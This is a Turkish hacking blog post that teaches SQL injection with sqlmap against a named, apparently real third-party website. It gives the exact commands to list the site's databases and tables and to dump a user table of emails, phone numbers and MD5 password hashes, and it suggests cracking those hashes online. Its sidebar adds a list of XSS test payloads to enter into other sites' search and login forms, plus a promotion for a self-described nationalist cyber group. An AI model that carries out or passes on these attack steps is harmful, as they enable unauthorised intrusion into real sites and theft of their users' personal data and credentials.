Sqlmap Sql injection ile site hackleme

-

 Merhaba bu konumuzda sizlere sql injectionun nasıl yapıldığını anlatacağım.

Kısa ve öz biçimde.

Bunun için sqlmap-master aracını kullanacağız.

Not: Asla Türk sitelerine saldırmayın.

Öncelikle sqlmap aracımızı indirmemiz lazım.

https://ay.live/aRNnZR bu adrese gidip indiriyoruz.



Sonra zip'ten çıkartıp masaüstüne atıyoruz.



Şimdi terminali açıp şunları yazın.

cd desktop

cd sqlmap-master


Sonra hedef site bulalım.

 http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 ben bu siteyi buldum.

Şimdi terminale şunları yazın.

python sqlmap.py -u hedef url --dbs

python sqlmap.py -u http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 --dbs

-u : url

--dbs:Database

Y/n gibi sorulara Y yazınız.




Şimdi datayı çekelim. Şu komutu girin

python sqlmap.py -u http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 -D fa23ugad_astech --tables

Burda fa23ugad_astech databasedeki tabloları getirmesini istiyoruz.

--tables: Tabloları getir


burda dikkatimi utenti tablosu çekti. 
O yüzden şunu yazıyorum 

python sqlmap.py -u http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 -D fa23ugad_astech -T utenti --columns

Burda utenti tablosunun içindeki colonları çekiyoruz.

--columns: kolon



Burda dikkatimi email,telefone,utende_ID,password,nome  çekti.

Onun için şunu yazıyoruz.

python sqlmap.py -u http://www.astechnology.sm/fr.as/leggi-news-as-technology.php?id=21 -D fa23ugad_astech -T utenti -C email,telefone,utende_ID,password,nome --dump

--dump:seçtiğim şeyleri önüme dök

Şimdi bu colonda olan bilgileri ekrana getirecek.




Bu şifre md5 ile şifrelenmiştir. Bunu internette kırabilirsiniz.

Konumuz buraya kadardı. 

Bir sonraki yazıda görüşmek üzere.



Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Xss açığı nasıl bulunur

-
Resim
Merhaba bugün size xss açığının nasıl bulunabileceğini göstereceğim. Hemen konuya geçelim uzatmaya gerek yok   xss açıkları için alert kodları var. Bunlar ; “><script>alert(‘xss’);</script>+ <title>XSS</title> javascript;alert(‘XSS’) “><script>alert(‘XSS’)</script> ‘><script>alert(‘XSS’)</script> {‘<script>alert(‘XSS’)</script> Bunları sitenin arama yerine, login formlarına yazıcaz. Hata verirse xss açığı vardır. Bunun gibi hata vermesi lazım. Takıldığınız yerlerde sosyal medyadan ulaşabilirsiniz.
Devamı

Türkoğlu Tim Kimdir

-
Resim
Türkoğlu Tim Kimdir   Türkiye'ye karşı internet üzerinden karşıt güçler tarafından yapılan ve yapılacak olan siber saldırılara karşı gönüllü olarak lobi faaliyeti sürdüren bir organizasyondur. Türkoğlu Tim bu faaliyetlerinde, özellikle ülkemizi hedef alan ülke ve unsurları belirleyerek, planlanan veya yapılacak olan herhangi bir saldırıya karşı cevap vermeyi kendine görev edinmiştir. Kuruluş amacımızın en önemli unsuru Devletçilik olmuştur. Ülkemizin kurumlarına, devlet adamlarına, manevi değerlerimize yapılan saygısızlıkları ülkemizin bütünlüğüne yapılan bir saldırı olarak görürüz ve ona göre adımlarımızı belirleriz. Başta İstihbarat Birimlerimiz olmak üzere, Emniyet teşkilatımıza, Askeri ordumuza karşı yapılmış olan herhangi bir hareketi kabullenmemiz mümkün değildir. Türkoğlu Tim birlik ve beraberlik yanlısı olarak varlığını sürdürerek, ırkçılıktan uzak, Edirne’den Kars’a kadar ülkemizi seven herkesi tek bir çatı altında birleştirmeyi amaçlamaktadır. Türkoğlu Tim Misyonu Turkogl...
Devamı